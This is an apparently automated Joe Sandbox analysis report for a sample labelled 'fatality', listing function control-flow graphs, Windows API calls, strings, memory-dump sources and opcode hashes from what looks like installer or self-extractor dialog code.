                                                                    control_flow_graph 355 dfc73f-dfc757 call dfeb78 call dfec50 360 dfd40d-dfd418 355->360 361 dfc75d-dfc787 call dfb314 355->361 361->360 364 dfc78d-dfc792 361->364 365 dfc793-dfc7a1 364->365 366 dfc7a2-dfc7b7 call dfaf98 365->366 369 dfc7b9 366->369 370 dfc7bb-dfc7d0 call df1fbb 369->370 373 dfc7dd-dfc7e0 370->373 374 dfc7d2-dfc7d6 370->374 375 dfd3d9-dfd404 call dfb314 373->375 376 dfc7e6 373->376 374->370 377 dfc7d8 374->377 375->365 389 dfd40a-dfd40c 375->389 378 dfca5f-dfca61 376->378 379 dfc9be-dfc9c0 376->379 380 dfc7ed-dfc7f0 376->380 381 dfca7c-dfca7e 376->381 377->375 378->375 385 dfca67-dfca77 SetWindowTextW 378->385 379->375 387 dfc9c6-dfc9d2 379->387 380->375 383 dfc7f6-dfc850 call dfa64d call debdf3 call dea544 call dea67e call de6edb 380->383 381->375 386 dfca84-dfca8b 381->386 446 dfc98f-dfc9a4 call dea5d1 383->446 385->375 386->375 390 dfca91-dfcaaa 386->390 391 dfc9e6-dfc9eb 387->391 392 dfc9d4-dfc9e5 call e07686 387->392 389->360 396 dfcaac 390->396 397 dfcab2-dfcac0 call e03e13 390->397 393 dfc9ed-dfc9f3 391->393 394 dfc9f5-dfca00 call dfb48e 391->394 392->391 400 dfca05-dfca07 393->400 394->400 396->397 397->375 409 dfcac6-dfcacf 397->409 406 dfca09-dfca10 call e03e13 400->406 407 dfca12-dfca32 call e03e13 call e03e3e 400->407 406->407 432 dfca4b-dfca4d 407->432 433 dfca34-dfca3b 407->433 413 dfcaf8-dfcafb 409->413 414 dfcad1-dfcad5 409->414 419 dfcb01-dfcb04 413->419 420 dfcbe0-dfcbee call df0602 413->420 418 dfcad7-dfcadf 414->418 414->419 418->375 424 dfcae5-dfcaf3 call df0602 418->424 425 dfcb06-dfcb0b 419->425 426 dfcb11-dfcb2c 419->426 436 dfcbf0-dfcc04 call e0279b 420->436 424->436 425->420 425->426 444 dfcb2e-dfcb68 426->444 445 dfcb76-dfcb7d 426->445 432->375 437 dfca53-dfca5a call e03e2e 432->437 434 dfca3d-dfca3f 433->434 435 dfca42-dfca4a call e07686 433->435 434->435 435->432 454 dfcc06-dfcc0a 436->454 455 dfcc11-dfcc62 call df0602 call dfb1be GetDlgItem SetWindowTextW SendMessageW call e03e49 436->455 437->375 471 dfcb6c-dfcb6e 444->471 472 dfcb6a 444->472 448 dfcb7f-dfcb97 call e03e13 445->448 449 dfcbab-dfcbce call e03e13 * 2 445->449 461 dfc9aa-dfc9b9 call dea55a 446->461 462 dfc855-dfc869 446->462 448->449 466 dfcb99-dfcba6 call df05da 448->466 449->436 480 dfcbd0-dfcbde call df05da 449->480 454->455 460 dfcc0c-dfcc0e 454->460 484 dfcc67-dfcc6b 455->484 460->455 461->375 477 dfc90f-dfc91f 462->477 478 dfc86f-dfc8a2 call deb991 call deb690 call e03e13 462->478 466->449 471->445 472->471 477->446 490 dfc921-dfc930 477->490 496 dfc8b5-dfc8c3 call debdb4 478->496 497 dfc8a4-dfc8b3 call e03e13 478->497 480->436 484->375 488 dfcc71-dfcc85 SendMessageW 484->488 488->375 490->446 495 dfc932-dfc935 490->495 498 dfc939-dfc965 call de4092 495->498 496->461 505 dfc8c9-dfc908 call e03e13 call dffff0 496->505 497->496 497->505 509 dfc937-dfc938 498->509 510 dfc967-dfc97d 498->510 505->477 509->498 510->446 514 dfc97f-dfc988 510->514 514->446
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DFC744
                                                                      • Part of subcall function 00DFAF98: _wcschr.LIBVCRUNTIME ref: 00DFB033
                                                                    • _wcslen.LIBCMT ref: 00DFCA0A
                                                                    • _wcslen.LIBCMT ref: 00DFCA13
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DFCA71
                                                                    • _wcslen.LIBCMT ref: 00DFCAB3
                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00DFCBFB
                                                                    • GetDlgItem.USER32(?,00000066), ref: 00DFCC36
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00DFCC46
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,00E2A472), ref: 00DFCC54
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DFCC7F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSendTextWindow$H_prologItem_wcschr_wcsrchr
                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                    • API String ID: 3356938749-312220925
                                                                    • Opcode ID: 9dddb2d716ecbed6a9822f1cd09e20cce693710211930ed32c826700dcbf5f37
                                                                    • Instruction ID: 3758063dc0cc76f949cc1aecf77d7a0bc595031bbfc2a091f9d01e9576d6cef8
                                                                    • Opcode Fuzzy Hash: 9dddb2d716ecbed6a9822f1cd09e20cce693710211930ed32c826700dcbf5f37
                                                                    • Instruction Fuzzy Hash: 02E161B290025CAADB24EBA4DD85DFE77BCEB04310F0591A6F749E3041EB749A858F70
                                                                    Function 00DEDA67 Relevance: 30.4, APIs: 4, Strings: 13, Instructions: 663COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DEDA70
                                                                    • _wcschr.LIBVCRUNTIME ref: 00DEDA91
                                                                      • Part of subcall function 00DEC29A: _wcslen.LIBCMT ref: 00DEC2A2
                                                                      • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                    • _wcslen.LIBCMT ref: 00DEDDE9
                                                                    • __fprintf_l.LIBCMT ref: 00DEDF1C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$H_prolog__fprintf_l_wcschr
                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$R$RTL$STRINGS$a
                                                                    • API String ID: 1810648836-2415259559
                                                                    • Opcode ID: c375e3fad638377d3674c5bb1ed0e04353385dafd1e0b701afb90234d2e649ee
                                                                    • Instruction ID: d0e5e39dd412971772d19e72939a2f083582eb85417d9473852580f4317b80a5
                                                                    • Opcode Fuzzy Hash: c375e3fad638377d3674c5bb1ed0e04353385dafd1e0b701afb90234d2e649ee
                                                                    • Instruction Fuzzy Hash: 9532E0719002989BCF24FF69C841AEE77A9FF48700F44411AFA45AB281EBB1DD85CB70
                                                                    Function 00DFD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                      • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                      • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010486,?), ref: 00DFB59E
                                                                      • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                      • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                    • GetDlgItem.USER32(00000068,?), ref: 00DFD4E8
                                                                    • ShowWindow.USER32(00000000,00000005,?,?), ref: 00DFD510
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFD51B
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFD529
                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD53F
                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DFD559
                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD59D
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DFD5AB
                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD5BA
                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD5E1
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E143F4), ref: 00DFD5F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                    • String ID: \
                                                                    • API String ID: 3569833718-2967466578
                                                                    • Opcode ID: a5091c3813f6819e8c32c9cbd5d40bfa29840d5e5900e118bc28a62b1c354bd0
                                                                    • Instruction ID: e9c406cad7029f389f34a82bb9cd8dda02bd6b385547fbe7a3f891a87f8720ee
                                                                    • Opcode Fuzzy Hash: a5091c3813f6819e8c32c9cbd5d40bfa29840d5e5900e118bc28a62b1c354bd0
                                                                    • Instruction Fuzzy Hash: 77310475145346BFE311DF31DC0AFAB7FADEB83708F000608F651A6290DBA48A0A8776
                                                                    Function 00DFD78F Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 184COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 836 dfd78f-dfd7a7 call dfec50 839 dfd7ad-dfd7b9 call e03e13 836->839 840 dfd9e8-dfd9f0 836->840 839->840 843 dfd7bf-dfd7e7 call dffff0 839->843 846 dfd7e9 843->846 847 dfd7f1-dfd7ff 843->847 846->847 848 dfd812-dfd818 847->848 849 dfd801-dfd804 847->849 850 dfd85b-dfd85e 848->850 851 dfd808-dfd80e 849->851 850->851 852 dfd860-dfd866 850->852 853 dfd837-dfd844 851->853 854 dfd810 851->854 857 dfd86d-dfd86f 852->857 858 dfd868-dfd86b 852->858 855 dfd84a-dfd84e 853->855 856 dfd9c0-dfd9c2 853->856 859 dfd822-dfd82c 854->859 862 dfd9c6 855->862 863 dfd854-dfd859 855->863 856->862 864 dfd882-dfd898 call deb92d 857->864 865 dfd871-dfd878 857->865 858->857 858->864 860 dfd82e 859->860 861 dfd81a-dfd820 859->861 860->853 861->859 866 dfd830-dfd833 861->866 869 dfd9cf 862->869 863->850 871 dfd89a-dfd8a7 call df1fbb 864->871 872 dfd8b1-dfd8bc call dea231 864->872 865->864 867 dfd87a 865->867 866->853 867->864 873 dfd9d6-dfd9d8 869->873 871->872 881 dfd8a9 871->881 882 dfd8be-dfd8d5 call deb6c4 872->882 883 dfd8d9-dfd8e6 ShellExecuteExW 872->883 876 dfd9da-dfd9dc 873->876 877 dfd9e7 873->877 876->877 880 dfd9de-dfd9e1 ShowWindow 876->880 877->840 880->877 881->872 882->883 883->877 885 dfd8ec-dfd8f9 883->885 887 dfd90c-dfd90e 885->887 888 dfd8fb-dfd902 885->888 890 dfd925-dfd944 call dfdc3b 887->890 891 dfd910-dfd919 887->891 888->887 889 dfd904-dfd90a 888->889 889->887 892 dfd97b-dfd987 889->892 890->892 903 dfd946-dfd94e 890->903 891->890 896 dfd91b-dfd923 ShowWindow 891->896 898 dfd989-dfd996 call df1fbb 892->898 899 dfd998-dfd9a6 892->899 896->890 898->869 898->899 899->873 902 dfd9a8-dfd9aa 899->902 902->873 905 dfd9ac-dfd9b2 902->905 903->892 906 dfd950-dfd961 903->906 905->873 907 dfd9b4-dfd9be 905->907 906->892 909 dfd963-dfd96d 906->909 907->873 910 dfd96f 909->910 911 dfd974 909->911 910->911 911->892
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow$ExecuteShell_wcslen
                                                                    • String ID: .exe$.inf$Install
                                                                    • API String ID: 855908426-1844831949
                                                                    • Opcode ID: aa0e351e02f8c161fbea9c2f1baafc4dc79bbe5ce84c4b3ca7df823c42348582
                                                                    • Instruction ID: a07a8899bc1826f9894ef3374f3e282cafce4097174dd7e5548f0d27ab88c4ed
                                                                    • Opcode Fuzzy Hash: aa0e351e02f8c161fbea9c2f1baafc4dc79bbe5ce84c4b3ca7df823c42348582
                                                                    • Instruction Fuzzy Hash: 3351F5714043889EDB309F65D8447BBBBE7AF81744F0A841EFAC4A7191D7B18989CB72
                                                                    Function 00DFABAB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 912 dfabab-dfabca GetClassNameW 913 dfabcc-dfabe1 call df1fbb 912->913 914 dfabf2-dfabf4 912->914 919 dfabe3-dfabef FindWindowExW 913->919 920 dfabf1 913->920 916 dfabff-dfac01 914->916 917 dfabf6-dfabf8 914->917 917->916 919->920 920->914
                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00DFABC2
                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DFABE9
                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00DFABF9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AutoClassCompleteFindNameWindow
                                                                    • String ID: @Ut$EDIT
                                                                    • API String ID: 1162832696-2065656831
                                                                    • Opcode ID: b47aca23fa7f529084335535ad285f88fb95a502034bcfa1020a7088af5605d8
                                                                    • Instruction ID: a4b56a49b7f1cdc650390fc1b3f6d9c37d2473f62cb7980feb258b74fd4090a1
                                                                    • Opcode Fuzzy Hash: b47aca23fa7f529084335535ad285f88fb95a502034bcfa1020a7088af5605d8
                                                                    • Instruction Fuzzy Hash: 22F0827660022D7ADB3096699C0AFEB776C9F46B41F4E8112BB09B21C0D760DA46C5B6
                                                                    Function 00DFF3F4 Relevance: 7.6, APIs: 5, Instructions: 111COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • ___scrt_release_startup_lock.LIBCMT ref: 00DFF444
                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00DFF458
                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 00DFF47E
                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 00DFF4C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ___scrt_is_nonwritable_in_current_image$___scrt_release_startup_lock___scrt_uninitialize_crt
                                                                    • String ID:
                                                                    • API String ID: 3089971210-0
                                                                    • Opcode ID: 6169013e71a9380d450aec5448d5ce5843a700057700a5c620cc585184c2cee9
                                                                    • Instruction ID: d330ebb97248a62da2dc84ab168752b09d0e39aad2ce51984fc7e676b42fe1eb
                                                                    • Opcode Fuzzy Hash: 6169013e71a9380d450aec5448d5ce5843a700057700a5c620cc585184c2cee9
                                                                    • Instruction Fuzzy Hash: 9531253264835A69CB347F74AC02BBE67A0DF41324F2AC079F7C07B6D2CE6149858674
                                                                    Function 00DFB568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 980 dfb568-dfb581 PeekMessageW 981 dfb5bc-dfb5be 980->981 982 dfb583-dfb597 GetMessageW 980->982 983 dfb599-dfb5a6 IsDialogMessageW 982->983 984 dfb5a8-dfb5b6 TranslateMessage DispatchMessageW 982->984 983->981 983->984 984->981
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                    • IsDialogMessageW.USER32(00010486,?), ref: 00DFB59E
                                                                    • TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                    • DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                    • String ID:
                                                                    • API String ID: 1266772231-0
                                                                    • Opcode ID: d285e7f67771a3c5b50f3426f04c0ce4ce9e617b899385ae33398361285f7e4f
                                                                    • Instruction ID: d085dce0393f91ec1a5a6c587589ff3e008c8bd2ca6d30fc2d3a1cd07349024f
                                                                    • Opcode Fuzzy Hash: d285e7f67771a3c5b50f3426f04c0ce4ce9e617b899385ae33398361285f7e4f
                                                                    • Instruction Fuzzy Hash: 15F0D675A01119AF8B209BF6DC4CDEB7FBCDF063517044515B519E2150EB38D60ACBB0
                                                                    Function 00DFAC16 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34comCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • OleInitialize.OLE32(00000000), ref: 00DFAC2F
                                                                    • SHGetMalloc.SHELL32(00E28438), ref: 00DFAC70
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeMalloc
                                                                    • String ID: riched20.dll$3Qo
                                                                    • API String ID: 48681180-4232643773
                                                                    • Opcode ID: ca3d7288377b5cb58d6efc8b4a6981a06886c3a3ff0a948f0718cb0737dc73e8
                                                                    • Instruction ID: 5395c4371c61b36d8740b72c149b5f4d03726217f58d59a7ce58fff57b688235
                                                                    • Opcode Fuzzy Hash: ca3d7288377b5cb58d6efc8b4a6981a06886c3a3ff0a948f0718cb0737dc73e8
                                                                    • Instruction Fuzzy Hash: B9F049B5D00209AFCB10AFAAD8499EFFFFCEF85700F10411AA811B2241CBB456068BA1
                                                                    Function 00E0A95B Relevance: 4.7, APIs: 3, Instructions: 216COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
